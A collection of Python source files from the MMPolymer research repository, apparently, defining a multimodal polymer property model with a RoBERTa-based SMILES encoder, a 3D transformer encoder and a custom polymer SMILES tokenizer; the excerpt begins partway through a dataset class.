center_coordinates="center_coordinates",
):
self.dataset = dataset
self.coordinates = coordinates
self.pocket_coordinates = pocket_coordinates
self.center_coordinates = center_coordinates
self.set_epoch(None)
def set_epoch(self, epoch, **unused):
super().set_epoch(epoch)
self.epoch = epoch
@lru_cache(maxsize=16)
def __cached_item__(self, index: int, epoch: int):
dd = self.dataset[index].copy()
coordinates = dd[self.coordinates]
pocket_coordinates = dd[self.pocket_coordinates]
# normalize coordinates and pocket coordinates ,align with pocket center coordinates
center_coordinates = pocket_coordinates.mean(axis=0)
coordinates = coordinates - center_coordinates
pocket_coordinates = pocket_coordinates - center_coordinates
dd[self.coordinates] = coordinates.astype(np.float32)
dd[self.pocket_coordinates] = pocket_coordinates.astype(np.float32)
dd[self.center_coordinates] = center_coordinates.astype(np.float32)
return dd
def __getitem__(self, index: int):
return self.__cached_item__(index, self.epoch)
| 2,427 | Python | .py | 56 | 35.785714 | 92 | 0.679237 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,148 | MMPolymer.py | FanmengWang_MMPolymer/MMPolymer/models/MMPolymer.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import logging
import torch
from sklearn.manifold import TSNE
import matplotlib.pyplot as plt
import torch.nn as nn
import torch.nn.functional as F
from unicore import utils
from unicore.models import BaseUnicoreModel, register_model, register_model_architecture
from unicore.modules import LayerNorm, init_bert_params
from .transformer_encoder_with_pair import TransformerEncoderWithPair
from typing import Dict, Any, List
from transformers import AdamW, get_linear_schedule_with_warmup, RobertaModel, RobertaConfig, RobertaTokenizer
from transformers import AutoModel, AutoConfig
from .PolymerSmilesTokenization import PolymerSmilesTokenizer
logger = logging.getLogger(__name__)
@register_model("MMPolymer")
class MMPolymerModel(BaseUnicoreModel):
@staticmethod
def add_args(parser):
"""Add model-specific arguments to the parser."""
parser.add_argument(
"--encoder-layers", type=int, metavar="L", help="num encoder layers"
)
parser.add_argument(
"--encoder-embed-dim",
type=int,
metavar="H",
help="encoder embedding dimension",
)
parser.add_argument(
"--encoder-ffn-embed-dim",
type=int,
metavar="F",
help="encoder embedding dimension for FFN",
)
parser.add_argument(
"--encoder-attention-heads",
type=int,
metavar="A",
help="num encoder attention heads",
)
parser.add_argument(
"--activation-fn",
choices=utils.get_available_activation_fns(),
help="activation function to use",
)
parser.add_argument(
"--pooler-activation-fn",
choices=utils.get_available_activation_fns(),
help="activation function to use for pooler layer",
)
parser.add_argument(
"--emb-dropout",
type=float,
metavar="D",
help="dropout probability for embeddings",
)
parser.add_argument(
"--dropout", type=float, metavar="D", help="dropout probability"
)
parser.add_argument(
"--attention-dropout",
type=float,
metavar="D",
help="dropout probability for attention weights",
)
parser.add_argument(
"--activation-dropout",
type=float,
metavar="D",
help="dropout probability after activation in FFN",
)
parser.add_argument(
"--pooler-dropout",
type=float,
metavar="D",
help="dropout probability in the masked_lm pooler layers",
)
parser.add_argument(
"--max-seq-len", type=int, help="number of positional embeddings to learn"
)
parser.add_argument(
"--post-ln", type=bool, help="use post layernorm or pre layernorm"
)
parser.add_argument(
"--masked-token-loss",
type=float,
metavar="D",
help="mask loss ratio",
)
parser.add_argument(
"--masked-dist-loss",
type=float,
metavar="D",
help="masked distance loss ratio",
)
parser.add_argument(
"--masked-coord-loss",
type=float,
metavar="D",
help="masked coord loss ratio",
)
parser.add_argument(
"--x-norm-loss",
type=float,
metavar="D",
help="x norm loss ratio",
)
parser.add_argument(
"--delta-pair-repr-norm-loss",
type=float,
metavar="D",
help="delta encoder pair repr norm loss ratio",
)
parser.add_argument(
"--masked-coord-dist-loss",
type=float,
metavar="D",
help="masked coord dist loss ratio",
)
parser.add_argument(
"--mode",
type=str,
default="train",
choices=["train", "infer"],
)
def __init__(self, args, dictionary):
super().__init__()
base_architecture(args)
self.args = args
self.padding_idx = dictionary.pad()
self.embed_tokens = nn.Embedding(
len(dictionary), args.encoder_embed_dim, self.padding_idx
)
self._num_updates = None
# 1D net
self.tokenizer = PolymerSmilesTokenizer.from_pretrained("roberta-base", max_len=411)
self.config = AutoConfig.from_pretrained("./MMPolymer/models/config")
self.PretrainedModel = RobertaModel(config=self.config)
self.PretrainedModel.config.hidden_dropout_prob = 0.1
self.PretrainedModel.config.attention_probs_dropout_prob = 0.1
self.PretrainedModel.resize_token_embeddings(len(self.tokenizer))
# 3D net
self.encoder = TransformerEncoderWithPair(
encoder_layers=args.encoder_layers,
embed_dim=args.encoder_embed_dim,
ffn_embed_dim=args.encoder_ffn_embed_dim,
attention_heads=args.encoder_attention_heads,
emb_dropout=args.emb_dropout,
dropout=args.dropout,
attention_dropout=args.attention_dropout,
activation_dropout=args.activation_dropout,
max_seq_len=args.max_seq_len,
activation_fn=args.activation_fn,
no_final_head_layer_norm=args.delta_pair_repr_norm_loss < 0,
)
K = 128
n_edge_type = len(dictionary) * len(dictionary)
self.gbf_proj = NonLinearHead(
K, args.encoder_attention_heads, args.activation_fn
)
self.gbf = GaussianLayer(K, n_edge_type)
self.seq_layer = NonLinearHead(
768, 512, args.activation_fn
)
self.space_layer = NonLinearHead(
512, 512, args.activation_fn
)
self.classification_head = nn.Sequential(
nn.Dropout(0.1),
nn.Linear(1024, 1024),
nn.SiLU(),
nn.Linear(1024, 1)
)
if args.masked_token_loss > 0:
self.lm_head = MaskLMHead(
embed_dim=args.encoder_embed_dim,
output_dim=len(dictionary),
activation_fn=args.activation_fn,
weight=None,
)
if args.masked_coord_loss > 0:
self.pair2coord_proj = NonLinearHead(
args.encoder_attention_heads, 1, args.activation_fn
)
if args.masked_dist_loss > 0:
self.dist_head = DistanceHead(
args.encoder_attention_heads, args.activation_fn
)
self.apply(init_bert_params)
@classmethod
def build_model(cls, args, task):
"""Build a new model instance."""
return cls(args, task.dictionary)
def forward(
self,
src_tokens,
src_distance,
src_coord,
src_edge_type,
src_input_ids,
src_attention_mask,
encoder_masked_tokens=None,
features_only=False,
classification_head_name=None,
**kwargs
):
if classification_head_name is not None:
features_only = True
padding_mask = src_tokens.eq(self.padding_idx)
if not padding_mask.any():
padding_mask = None
x = self.embed_tokens(src_tokens)
def get_dist_features(dist, et):
n_node = dist.size(-1)
gbf_feature = self.gbf(dist, et)
gbf_result = self.gbf_proj(gbf_feature)
graph_attn_bias = gbf_result
graph_attn_bias = graph_attn_bias.permute(0, 3, 1, 2).contiguous()
graph_attn_bias = graph_attn_bias.view(-1, n_node, n_node)
return graph_attn_bias
graph_attn_bias = get_dist_features(src_distance, src_edge_type)
(
encoder_rep,
encoder_pair_rep,
delta_encoder_pair_rep,
x_norm,
delta_encoder_pair_rep_norm,
) = self.encoder(x, padding_mask=padding_mask, attn_mask=graph_attn_bias)
encoder_pair_rep[encoder_pair_rep == float("-inf")] = 0
seq_rep = self.PretrainedModel(input_ids=src_input_ids, attention_mask=src_attention_mask).last_hidden_state
encoder_distance = None
encoder_coord = None
if not features_only:
if self.args.masked_token_loss > 0:
logits = self.lm_head(encoder_rep, encoder_masked_tokens)
if self.args.masked_coord_loss > 0:
coords_emb = src_coord
if padding_mask is not None:
atom_num = (torch.sum(1 - padding_mask.type_as(x), dim=1) - 1).view(
-1, 1, 1, 1
)
else:
atom_num = src_coord.shape[1] - 1
delta_pos = coords_emb.unsqueeze(1) - coords_emb.unsqueeze(2)
attn_probs = self.pair2coord_proj(delta_encoder_pair_rep)
coord_update = delta_pos / atom_num * attn_probs
coord_update = torch.sum(coord_update, dim=2)
encoder_coord = coords_emb + coord_update
if self.args.masked_dist_loss > 0:
encoder_distance = self.dist_head(encoder_pair_rep)
seq_output = self.seq_layer(seq_rep.detach())
space_output = self.space_layer(encoder_rep.detach())
if classification_head_name is not None:
seq_output = self.seq_layer(seq_rep)
space_output = self.space_layer(encoder_rep)
mol_output = torch.cat((seq_output[:, 0, :], space_output[:, 0, :]), dim=-1)
logits = self.classification_head(mol_output)
if self.args.mode == 'infer':
return encoder_rep, encoder_pair_rep
else:
return (
logits,
encoder_distance,
encoder_coord,
x_norm,
delta_encoder_pair_rep_norm,
seq_output[:, 0, :],
space_output[:, 0, :],
)
def set_num_updates(self, num_updates):
"""State from trainer to pass along to model at every update."""
self._num_updates = num_updates
def get_num_updates(self):
return self._num_updates
class MaskLMHead(nn.Module):
"""Head for masked language modeling."""
def __init__(self, embed_dim, output_dim, activation_fn, weight=None):
super().__init__()
self.dense = nn.Linear(embed_dim, embed_dim)
self.activation_fn = utils.get_activation_fn(activation_fn)
self.layer_norm = LayerNorm(embed_dim)
if weight is None:
weight = nn.Linear(embed_dim, output_dim, bias=False).weight
self.weight = weight
self.bias = nn.Parameter(torch.zeros(output_dim))
def forward(self, features, masked_tokens=None, **kwargs):
# Only project the masked tokens while training,
# saves both memory and computation
if masked_tokens is not None:
features = features[masked_tokens, :]
x = self.dense(features)
x = self.activation_fn(x)
x = self.layer_norm(x)
# project back to size of vocabulary with bias
x = F.linear(x, self.weight) + self.bias
return x
class NonLinearHead(nn.Module):
"""Head for simple classification tasks."""
def __init__(
self,
input_dim,
out_dim,
activation_fn,
hidden=None,
):
super().__init__()
hidden = input_dim if not hidden else hidden
self.linear1 = nn.Linear(input_dim, hidden)
self.linear2 = nn.Linear(hidden, out_dim)
self.activation_fn = utils.get_activation_fn(activation_fn)
def forward(self, x):
x = self.linear1(x)
x = self.activation_fn(x)
x = self.linear2(x)
return x
class DistanceHead(nn.Module):
def __init__(
self,
heads,
activation_fn,
):
super().__init__()
self.dense = nn.Linear(heads, heads)
self.layer_norm = nn.LayerNorm(heads)
self.out_proj = nn.Linear(heads, 1)
self.activation_fn = utils.get_activation_fn(activation_fn)
def forward(self, x):
bsz, seq_len, seq_len, _ = x.size()
# x[x == float('-inf')] = 0
x = self.dense(x)
x = self.activation_fn(x)
x = self.layer_norm(x)
x = self.out_proj(x).view(bsz, seq_len, seq_len)
x = (x + x.transpose(-1, -2)) * 0.5
return x
@torch.jit.script
def gaussian(x, mean, std):
pi = 3.14159
a = (2 * pi) ** 0.5
return torch.exp(-0.5 * (((x - mean) / std) ** 2)) / (a * std)
class GaussianLayer(nn.Module):
def __init__(self, K=128, edge_types=1024):
super().__init__()
self.K = K
self.means = nn.Embedding(1, K)
self.stds = nn.Embedding(1, K)
self.mul = nn.Embedding(edge_types, 1)
self.bias = nn.Embedding(edge_types, 1)
nn.init.uniform_(self.means.weight, 0, 3)
nn.init.uniform_(self.stds.weight, 0, 3)
nn.init.constant_(self.bias.weight, 0)
nn.init.constant_(self.mul.weight, 1)
def forward(self, x, edge_type):
mul = self.mul(edge_type).type_as(x)
bias = self.bias(edge_type).type_as(x)
x = mul * x.unsqueeze(-1) + bias
x = x.expand(-1, -1, -1, self.K)
mean = self.means.weight.float().view(-1)
std = self.stds.weight.float().view(-1).abs() + 1e-5
return gaussian(x.float(), mean, std).type_as(self.means.weight)
@register_model_architecture("MMPolymer", "MMPolymer")
def base_architecture(args):
args.encoder_layers = getattr(args, "encoder_layers", 15)
args.encoder_embed_dim = getattr(args, "encoder_embed_dim", 512)
args.encoder_ffn_embed_dim = getattr(args, "encoder_ffn_embed_dim", 2048)
args.encoder_attention_heads = getattr(args, "encoder_attention_heads", 64)
args.dropout = getattr(args, "dropout", 0.1)
args.emb_dropout = getattr(args, "emb_dropout", 0.1)
args.attention_dropout = getattr(args, "attention_dropout", 0.1)
args.activation_dropout = getattr(args, "activation_dropout", 0.0)
args.pooler_dropout = getattr(args, "pooler_dropout", 0.0)
args.max_seq_len = getattr(args, "max_seq_len", 512)
args.activation_fn = getattr(args, "activation_fn", "gelu")
args.pooler_activation_fn = getattr(args, "pooler_activation_fn", "tanh")
args.post_ln = getattr(args, "post_ln", False)
args.masked_token_loss = getattr(args, "masked_token_loss", -1.0)
args.masked_coord_loss = getattr(args, "masked_coord_loss", -1.0)
args.masked_dist_loss = getattr(args, "masked_dist_loss", -1.0)
args.x_norm_loss = getattr(args, "x_norm_loss", -1.0)
args.delta_pair_repr_norm_loss = getattr(args, "delta_pair_repr_norm_loss", -1.0)
@register_model_architecture("MMPolymer", "MMPolymer_base")
def MMPolymer_base_architecture(args):
base_architecture(args)
| 15,358 | Python | .py | 386 | 29.608808 | 116 | 0.586082 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,149 | transformer_encoder_with_pair.py | FanmengWang_MMPolymer/MMPolymer/models/transformer_encoder_with_pair.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
from typing import Optional
import math
import torch
import torch.nn as nn
import torch.nn.functional as F
from unicore.modules import TransformerEncoderLayer, LayerNorm
class TransformerEncoderWithPair(nn.Module):
def __init__(
self,
encoder_layers: int = 6,
embed_dim: int = 768,
ffn_embed_dim: int = 3072,
attention_heads: int = 8,
emb_dropout: float = 0.1,
dropout: float = 0.1,
attention_dropout: float = 0.1,
activation_dropout: float = 0.0,
max_seq_len: int = 256,
activation_fn: str = "gelu",
post_ln: bool = False,
no_final_head_layer_norm: bool = False,
) -> None:
super().__init__()
self.emb_dropout = emb_dropout
self.max_seq_len = max_seq_len
self.embed_dim = embed_dim
self.attention_heads = attention_heads
self.emb_layer_norm = LayerNorm(self.embed_dim)
if not post_ln:
self.final_layer_norm = LayerNorm(self.embed_dim)
else:
self.final_layer_norm = None
if not no_final_head_layer_norm:
self.final_head_layer_norm = LayerNorm(attention_heads)
else:
self.final_head_layer_norm = None
self.layers = nn.ModuleList(
[
TransformerEncoderLayer(
embed_dim=self.embed_dim,
ffn_embed_dim=ffn_embed_dim,
attention_heads=attention_heads,
dropout=dropout,
attention_dropout=attention_dropout,
activation_dropout=activation_dropout,
activation_fn=activation_fn,
post_ln=post_ln,
)
for _ in range(encoder_layers)
]
)
def forward(
self,
emb: torch.Tensor,
attn_mask: Optional[torch.Tensor] = None,
padding_mask: Optional[torch.Tensor] = None,
) -> torch.Tensor:
bsz = emb.size(0)
seq_len = emb.size(1)
x = self.emb_layer_norm(emb)
x = F.dropout(x, p=self.emb_dropout, training=self.training)
# account for padding while computing the representation
if padding_mask is not None:
x = x * (1 - padding_mask.unsqueeze(-1).type_as(x))
input_attn_mask = attn_mask
input_padding_mask = padding_mask
def fill_attn_mask(attn_mask, padding_mask, fill_val=float("-inf")):
if attn_mask is not None and padding_mask is not None:
# merge key_padding_mask and attn_mask
attn_mask = attn_mask.view(x.size(0), -1, seq_len, seq_len)
attn_mask.masked_fill_(
padding_mask.unsqueeze(1).unsqueeze(2).to(torch.bool),
fill_val,
)
attn_mask = attn_mask.view(-1, seq_len, seq_len)
padding_mask = None
return attn_mask, padding_mask
assert attn_mask is not None
attn_mask, padding_mask = fill_attn_mask(attn_mask, padding_mask)
for i in range(len(self.layers)):
x, attn_mask, _ = self.layers[i](
x, padding_mask=padding_mask, attn_bias=attn_mask, return_attn=True
)
def norm_loss(x, eps=1e-10, tolerance=1.0):
x = x.float()
max_norm = x.shape[-1] ** 0.5
norm = torch.sqrt(torch.sum(x**2, dim=-1) + eps)
error = torch.nn.functional.relu((norm - max_norm).abs() - tolerance)
return error
def masked_mean(mask, value, dim=-1, eps=1e-10):
return (
torch.sum(mask * value, dim=dim) / (eps + torch.sum(mask, dim=dim))
).mean()
x_norm = norm_loss(x)
if input_padding_mask is not None:
token_mask = 1.0 - input_padding_mask.float()
else:
token_mask = torch.ones_like(x_norm, device=x_norm.device)
x_norm = masked_mean(token_mask, x_norm)
if self.final_layer_norm is not None:
x = self.final_layer_norm(x)
delta_pair_repr = attn_mask - input_attn_mask
delta_pair_repr, _ = fill_attn_mask(delta_pair_repr, input_padding_mask, 0)
attn_mask = (
attn_mask.view(bsz, -1, seq_len, seq_len).permute(0, 2, 3, 1).contiguous()
)
delta_pair_repr = (
delta_pair_repr.view(bsz, -1, seq_len, seq_len)
.permute(0, 2, 3, 1)
.contiguous()
)
pair_mask = token_mask[..., None] * token_mask[..., None, :]
delta_pair_repr_norm = norm_loss(delta_pair_repr)
delta_pair_repr_norm = masked_mean(
pair_mask, delta_pair_repr_norm, dim=(-1, -2)
)
if self.final_head_layer_norm is not None:
delta_pair_repr = self.final_head_layer_norm(delta_pair_repr)
return x, attn_mask, delta_pair_repr, x_norm, delta_pair_repr_norm
| 5,102 | Python | .py | 121 | 31.107438 | 86 | 0.566331 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
2,290,150 | PolymerSmilesTokenization.py | FanmengWang_MMPolymer/MMPolymer/models/PolymerSmilesTokenization.py | # This source code is licensed under the GPL-3.0 license found in the
# LICENSE file in the root directory of this source tree.
import json
import os
from functools import lru_cache
from typing import List, Optional, Tuple
import regex as re
from transformers import AddedToken, PreTrainedTokenizer
import logging
from transformers import RobertaTokenizer
logger = logging.getLogger(__name__)
VOCAB_FILES_NAMES = {
"vocab_file": "vocab.json",
"merges_file": "merges.txt",
}
PRETRAINED_VOCAB_FILES_MAP = {
"vocab_file": {
"roberta-base": "https://huggingface.co/roberta-base/resolve/main/vocab.json",
"roberta-large": "https://huggingface.co/roberta-large/resolve/main/vocab.json",
"roberta-large-mnli": "https://huggingface.co/roberta-large-mnli/resolve/main/vocab.json",
"distilroberta-base": "https://huggingface.co/distilroberta-base/resolve/main/vocab.json",
"roberta-base-openai-detector": "https://huggingface.co/roberta-base-openai-detector/resolve/main/vocab.json",
"roberta-large-openai-detector": "https://huggingface.co/roberta-large-openai-detector/resolve/main/vocab.json",
},
"merges_file": {
"roberta-base": "https://huggingface.co/roberta-base/resolve/main/merges.txt",
"roberta-large": "https://huggingface.co/roberta-large/resolve/main/merges.txt",
"roberta-large-mnli": "https://huggingface.co/roberta-large-mnli/resolve/main/merges.txt",
"distilroberta-base": "https://huggingface.co/distilroberta-base/resolve/main/merges.txt",
"roberta-base-openai-detector": "https://huggingface.co/roberta-base-openai-detector/resolve/main/merges.txt",
"roberta-large-openai-detector": "https://huggingface.co/roberta-large-openai-detector/resolve/main/merges.txt",
},
}
PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES = {
"roberta-base": 512,
"roberta-large": 512,
"roberta-large-mnli": 512,
"distilroberta-base": 512,
"roberta-base-openai-detector": 512,
"roberta-large-openai-detector": 512,
}
@lru_cache()
def bytes_to_unicode():
"""
Returns list of utf-8 byte and a mapping to unicode strings. We specifically avoids mapping to whitespace/control
characters the bpe code barfs on.
The reversible bpe codes work on unicode strings. This means you need a large # of unicode characters in your vocab
if you want to avoid UNKs. When you're at something like a 10B token dataset you end up needing around 5K for
decent coverage. This is a significant percentage of your normal, say, 32K bpe vocab. To avoid that, we want lookup
tables between utf-8 bytes and unicode strings.
"""
bs = (
list(range(ord("!"), ord("~") + 1)) + list(range(ord("¡"), ord("¬") + 1)) + list(range(ord("®"), ord("ÿ") + 1))
)
cs = bs[:]
n = 0
for b in range(2**8):
if b not in bs:
bs.append(b)
cs.append(2**8 + n)
n += 1
cs = [chr(n) for n in cs]
return dict(zip(bs, cs))
def get_pairs(word):
"""
Return set of symbol pairs in a word.
Word is represented as tuple of symbols (symbols being variable-length strings).
"""
pairs = set()
prev_char = word[0]
for char in word[1:]:
pairs.add((prev_char, char))
prev_char = char
return pairs
class PolymerSmilesTokenizer(PreTrainedTokenizer):
"""Adapt Roberta Tokenizer to PolymerSmilesTokenzier"""
"""
Original Comments:
Constructs a RoBERTa tokenizer, derived from the GPT-2 tokenizer, using byte-level Byte-Pair-Encoding.
This tokenizer has been trained to treat spaces like parts of the tokens (a bit like sentencepiece) so a word will
be encoded differently whether it is at the beginning of the sentence (without space) or not:
```
#>>> from transformers import RobertaTokenizer
#>>> tokenizer = RobertaTokenizer.from_pretrained("roberta-base")
#>>> tokenizer("Hello world")['input_ids']
[0, 31414, 232, 328, 2]
#>>> tokenizer(" Hello world")['input_ids']
[0, 20920, 232, 2]
```
You can get around that behavior by passing `add_prefix_space=True` when instantiating this tokenizer or when you
call it on some text, but since the model was not pretrained this way, it might yield a decrease in performance.
<Tip>
When used with `is_split_into_words=True`, this tokenizer will add a space before each word (even the first one).
</Tip>
This tokenizer inherits from [`PreTrainedTokenizer`] which contains most of the main methods. Users should refer to
this superclass for more information regarding those methods.
Args:
vocab_file (`str`):
Path to the vocabulary file.
merges_file (`str`):
Path to the merges file.
errors (`str`, *optional*, defaults to `"replace"`):
Paradigm to follow when decoding bytes to UTF-8. See
[bytes.decode](https://docs.python.org/3/library/stdtypes.html#bytes.decode) for more information.
bos_token (`str`, *optional*, defaults to `"<s>"`):
The beginning of sequence token that was used during pretraining. Can be used a sequence classifier token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the beginning of
sequence. The token used is the `cls_token`.
</Tip>
eos_token (`str`, *optional*, defaults to `"</s>"`):
The end of sequence token.
<Tip>
When building a sequence using special tokens, this is not the token that is used for the end of sequence.
The token used is the `sep_token`.
</Tip>
sep_token (`str`, *optional*, defaults to `"</s>"`):
The separator token, which is used when building a sequence from multiple sequences, e.g. two sequences for
sequence classification or for a text and a question for question answering. It is also used as the last
token of a sequence built with special tokens.
cls_token (`str`, *optional*, defaults to `"<s>"`):
The classifier token which is used when doing sequence classification (classification of the whole sequence
instead of per-token classification). It is the first token of the sequence when built with special tokens.
unk_token (`str`, *optional*, defaults to `"<unk>"`):
The unknown token. A token that is not in the vocabulary cannot be converted to an ID and is set to be this
token instead.
pad_token (`str`, *optional*, defaults to `"<pad>"`):
The token used for padding, for example when batching sequences of different lengths.
mask_token (`str`, *optional*, defaults to `"<mask>"`):
The token used for masking values. This is the token used when training this model with masked language
modeling. This is the token which the model will try to predict.
add_prefix_space (`bool`, *optional*, defaults to `False`):
Whether or not to add an initial space to the input. This allows to treat the leading word just as any
other word. (RoBERTa tokenizer detect beginning of words by the preceding space).
"""
vocab_files_names = VOCAB_FILES_NAMES
pretrained_vocab_files_map = PRETRAINED_VOCAB_FILES_MAP
max_model_input_sizes = PRETRAINED_POSITIONAL_EMBEDDINGS_SIZES
model_input_names = ["input_ids", "attention_mask"]
def __init__(
self,
vocab_file,
merges_file,
errors="replace",
bos_token="<s>",
eos_token="</s>",
sep_token="</s>",
cls_token="<s>",
unk_token="<unk>",
pad_token="<pad>",
mask_token="<mask>",
add_prefix_space=False,
**kwargs
):
bos_token = AddedToken(bos_token, lstrip=False, rstrip=False) if isinstance(bos_token, str) else bos_token
eos_token = AddedToken(eos_token, lstrip=False, rstrip=False) if isinstance(eos_token, str) else eos_token
sep_token = AddedToken(sep_token, lstrip=False, rstrip=False) if isinstance(sep_token, str) else sep_token
cls_token = AddedToken(cls_token, lstrip=False, rstrip=False) if isinstance(cls_token, str) else cls_token
unk_token = AddedToken(unk_token, lstrip=False, rstrip=False) if isinstance(unk_token, str) else unk_token
pad_token = AddedToken(pad_token, lstrip=False, rstrip=False) if isinstance(pad_token, str) else pad_token
# Mask token behave like a normal word, i.e. include the space before it
mask_token = AddedToken(mask_token, lstrip=True, rstrip=False) if isinstance(mask_token, str) else mask_token
super().__init__(
errors=errors,
bos_token=bos_token,
eos_token=eos_token,
unk_token=unk_token,
sep_token=sep_token,
cls_token=cls_token,
pad_token=pad_token,
mask_token=mask_token,
add_prefix_space=add_prefix_space,
**kwargs,
)
with open(vocab_file, encoding="utf-8") as vocab_handle:
self.encoder = json.load(vocab_handle)
self.decoder = {v: k for k, v in self.encoder.items()}
self.errors = errors # how to handle errors in decoding
self.byte_encoder = bytes_to_unicode()
self.byte_decoder = {v: k for k, v in self.byte_encoder.items()}
with open(merges_file, encoding="utf-8") as merges_handle:
bpe_merges = merges_handle.read().split("\n")[1:-1]
bpe_merges = [tuple(merge.split()) for merge in bpe_merges]
self.bpe_ranks = dict(zip(bpe_merges, range(len(bpe_merges))))
self.cache = {}
self.add_prefix_space = add_prefix_space
# Should have added re.IGNORECASE so BPE merges can happen for capitalized versions of contractions
"""Regex for SMILES"""
smi_regex_pattern = r"(\-?[0-9]+\.?[0-9]*|\[|\]|SELF|Li|Be|Na|Mg|Al|K|Ca|Co|Zn|Ga|Ge|As|Se|Sn|Te|N|O|P|H|I|b|c|n|o|s|p|Br?|Cl?|Fe?|Ni?|Si?|\||\(|\)|\^|=|#|-|\+|\\|\/|@|\*|\.|\%|\$)"
self.pat = re.compile(smi_regex_pattern)
@property
def vocab_size(self):
return len(self.encoder)
def get_vocab(self):
return dict(self.encoder, **self.added_tokens_encoder)
def bpe(self, token):
if token in self.cache:
return self.cache[token]
word = tuple(token)
pairs = get_pairs(word)
if not pairs:
return token
while True:
bigram = min(pairs, key=lambda pair: self.bpe_ranks.get(pair, float("inf")))
if bigram not in self.bpe_ranks:
break
first, second = bigram
new_word = []
i = 0
while i < len(word):
try:
j = word.index(first, i)
except ValueError:
new_word.extend(word[i:])
break
else:
new_word.extend(word[i:j])
i = j
if word[i] == first and i < len(word) - 1 and word[i + 1] == second:
new_word.append(first + second)
i += 2
else:
new_word.append(word[i])
i += 1
new_word = tuple(new_word)
word = new_word
if len(word) == 1:
break
else:
pairs = get_pairs(word)
word = " ".join(word)
self.cache[token] = word
return word
def _tokenize(self, text):
"""Tokenize a string."""
bpe_tokens = []
for token in re.findall(self.pat, text):
token = "".join(
self.byte_encoder[b] for b in token.encode("utf-8")
) # Maps all our bytes to unicode strings, avoiding control tokens of the BPE (spaces in our case)
bpe_tokens.extend(bpe_token for bpe_token in self.bpe(token).split(" "))
return bpe_tokens
def _convert_token_to_id(self, token):
"""Converts a token (str) in an id using the vocab."""
return self.encoder.get(token, self.encoder.get(self.unk_token))
def _convert_id_to_token(self, index):
"""Converts an index (integer) in a token (str) using the vocab."""
return self.decoder.get(index)
def convert_tokens_to_string(self, tokens):
"""Converts a sequence of tokens (string) in a single string."""
text = "".join(tokens)
text = bytearray([self.byte_decoder[c] for c in text]).decode("utf-8", errors=self.errors)
return text
def save_vocabulary(self, save_directory: str, filename_prefix: Optional[str] = None) -> Tuple[str]:
if not os.path.isdir(save_directory):
logger.error(f"Vocabulary path ({save_directory}) should be a directory")
return
vocab_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["vocab_file"]
)
merge_file = os.path.join(
save_directory, (filename_prefix + "-" if filename_prefix else "") + VOCAB_FILES_NAMES["merges_file"]
)
with open(vocab_file, "w", encoding="utf-8") as f:
f.write(json.dumps(self.encoder, ensure_ascii=False))
index = 0
with open(merge_file, "w", encoding="utf-8") as writer:
writer.write("#version: 0.2\n")
for bpe_tokens, token_index in sorted(self.bpe_ranks.items(), key=lambda kv: kv[1]):
if index != token_index:
logger.warning(
f"Saving vocabulary to {merge_file}: BPE merge indices are not consecutive."
" Please check that the tokenizer is not corrupted!"
)
index = token_index
writer.write(" ".join(bpe_tokens) + "\n")
index += 1
return vocab_file, merge_file
def build_inputs_with_special_tokens(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Build model inputs from a sequence or a pair of sequence for sequence classification tasks by concatenating and
adding special tokens. A RoBERTa sequence has the following format:
- single sequence: `<s> X </s>`
- pair of sequences: `<s> A </s></s> B </s>`
Args:
token_ids_0 (`List[int]`):
List of IDs to which the special tokens will be added.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of [input IDs](../glossary#input-ids) with the appropriate special tokens.
"""
if token_ids_1 is None:
return [self.cls_token_id] + token_ids_0 + [self.sep_token_id]
cls = [self.cls_token_id]
sep = [self.sep_token_id]
return cls + token_ids_0 + sep + sep + token_ids_1 + sep
def get_special_tokens_mask(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None, already_has_special_tokens: bool = False
) -> List[int]:
"""
Retrieve sequence ids from a token list that has no special tokens added. This method is called when adding
special tokens using the tokenizer `prepare_for_model` method.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
already_has_special_tokens (`bool`, *optional*, defaults to `False`):
Whether or not the token list is already formatted with special tokens for the model.
Returns:
`List[int]`: A list of integers in the range [0, 1]: 1 for a special token, 0 for a sequence token.
"""
if already_has_special_tokens:
return super().get_special_tokens_mask(
token_ids_0=token_ids_0, token_ids_1=token_ids_1, already_has_special_tokens=True
)
if token_ids_1 is None:
return [1] + ([0] * len(token_ids_0)) + [1]
return [1] + ([0] * len(token_ids_0)) + [1, 1] + ([0] * len(token_ids_1)) + [1]
def create_token_type_ids_from_sequences(
self, token_ids_0: List[int], token_ids_1: Optional[List[int]] = None
) -> List[int]:
"""
Create a mask from the two sequences passed to be used in a sequence-pair classification task. RoBERTa does not
make use of token type ids, therefore a list of zeros is returned.
Args:
token_ids_0 (`List[int]`):
List of IDs.
token_ids_1 (`List[int]`, *optional*):
Optional second list of IDs for sequence pairs.
Returns:
`List[int]`: List of zeros.
"""
sep = [self.sep_token_id]
cls = [self.cls_token_id]
if token_ids_1 is None:
return len(cls + token_ids_0 + sep) * [0]
return len(cls + token_ids_0 + sep + sep + token_ids_1 + sep) * [0]
def prepare_for_tokenization(self, text, is_split_into_words=False, **kwargs):
add_prefix_space = kwargs.pop("add_prefix_space", self.add_prefix_space)
if (is_split_into_words or add_prefix_space) and (len(text) > 0 and not text[0].isspace()):
text = " " + text
return (text, kwargs) | 18,013 | Python | .py | 346 | 41.184971 | 190 | 0.605181 | FanmengWang/MMPolymer | 8 | 0 | 0 | GPL-3.0 | 9/5/2024, 10:49:00 PM (Europe/Amsterdam) |
